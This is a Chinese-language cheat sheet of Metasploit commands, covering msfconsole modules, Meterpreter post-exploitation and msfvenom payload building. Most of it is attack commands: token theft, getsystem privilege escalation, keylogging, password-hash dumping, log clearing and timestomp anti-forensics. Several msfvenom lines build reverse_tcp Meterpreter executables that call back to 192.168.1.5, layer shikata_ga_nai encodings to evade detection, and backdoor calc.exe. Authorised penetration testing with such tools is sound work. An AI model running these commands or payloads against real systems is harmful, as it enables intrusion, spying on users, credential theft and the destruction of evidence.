metasploit
启动终端 msfconsole
help metasploit命令
tab 可以补全命令,文件之类的
search xxx
show exploitspayloadsauxiliary ame
info 展示出制定渗透攻击或模块的相关信息
use name 装载一个渗透攻击或者模块
LHOST 本地可以让目标主机连接的ip地址,通常目标主机不在同一个局域网内,就需要是公共ip地址
RHOST 远程主机或目标主机
set funtion 设置特定的配置参数
setg function 设置全局特定的配置参数,就是使用不同的模块不需要再设置一些配置了
show options 列出某个渗透攻击或模块中所有的配置参数
show targets 列出渗透攻击所支持的目标平台,哪些系统以及什么级别补丁才可能渗透成功
set payload payload
show advanced 列出所有高级配置选项 , 有些可以自动化攻击
set autorunscript migrate -f 在渗透攻击完成后,将自动迁移到另一进程
check 检测目标是否对选定渗透攻击存在相应安全漏洞
exploit -j 攻击将在后台进行
exploit -z 渗透攻击成功后不与会话进行交互
exploit -e encoder 制定使用的攻击载荷编码方式
sessions -l 列出可用的交互会话
sessions -l -v 详细信息
sessions -s script 在所有活跃的会话中运行一个特定的meterpreter脚本
sessions -K 杀死所有会话
sessions -c cmd 执行一个命令
db_creat name 创建一个数据库
db_connect name 创建并连接数据库
workspace 列出当前连接的数据库中所有的工作空间
workspace name 使用指定的工作空间
workspace -a name 创建一个工作空间
workspace -d name 删除指定的工作空间
workspcae -D 删除所有的工作空间
db-namp 利用namp 并把扫描数据存储到数据库中
Meterpreter
run scriptname
sysinfo 列出受控主机的系统信息
ps 显示所有运行进程以及关联的用户账号
migrate PID 迁移到一个指定的进程ID
use incognito 用来盗窃目标主机的令牌或是假冒客户
list_tokens -u 列出目标主机用户的可用令牌
list_tokens -g 列出目标主机用户组的可用令牌
steal_token PID 盗窃给定进程的可用令牌并进行令牌假冒
drop_token 停止假冒当前令牌
getsystem 通过各种攻击向量来提升到系统用户权限
shell 以所有可用令牌来运行一个交互的shell
execute -f cmd.exe -i 执行cmd.exe 命令 并进行交互
execute -f cmd.exe -i -t 以所有可用令牌来执行cmd命令
execute -f cmd.exe -i -H -t 以所有可用令牌来执行cmd命令并隐藏该进程
rev2self 回到控制目标主机的初始账户下
reg command 在目标主机注册表中进行交互。创建,删除,查询等操作
screenshot 对目标主机的屏幕进行截图
upload file 向目标主机上传文件
download file 从目标主机下载文件
keyscan_start 针对远程目标主机开启键盘记录功能
keyscan_dump 存储目标上捕获的键盘记录
keyscan_stop 停止针对目标主机上的键盘操作
getprivs 尽可能多的获取目标主机上的特权
uictl enable keyboard/mouse 接管目标主机的键盘和鼠标
background 将你当前的meterpreter shell 转为后台执行
hashdump 导出目标主机中的哈希口令值
use sniffer 加载嗅探模块
sniffer_interfaces 列出目标主机所有开放的网络接口
sniffer_dump/start/stats/stop interfaceID
clearev 清除目标主机上的日志记录
reboot 重启目标主机
timestomp 修改文件属性,例如修改文件的创建时间(反取证调查)
msfvenom
msfvenom -l payloads 列出所有可用的攻击载荷,encoders、nops、all 列出所有可用的编码器/空指令生成器/全部模块
msfvenom -p windows/meterpreter/bind_tcp --payload-options 列出配置项
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -f exe -o payload.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe -o en_payload.exe
//将该payload进行了5次shikata_ga_nai编码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -e x86/_countdown -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -i 5 -f exe -o multi_payload.exe
//创建一个经过多种编码格式嵌套编码的攻击载荷
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -x clac.exe -k -o playload.exe -e x86/shikata_ga_nai -i 7 -f exe
// 使用calc.exe 作为载荷后门程序,让载荷执行流一直运行在被攻击的应用程序中
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -x clac.exe -o playload.exe -e x86/shikata_ga_nai -i 7 -f exe
// 不让载荷执行流一直运行在被攻击的应用程序中,同时在攻击载荷执行后,也不会在目标主机上弹出任何信息
meterpreter 后渗透阶段命令
meterpreter > use priv
meterpreter > getsystem
meterpreter > ps
meterpreter > steal_token 1784
meterpreter > shell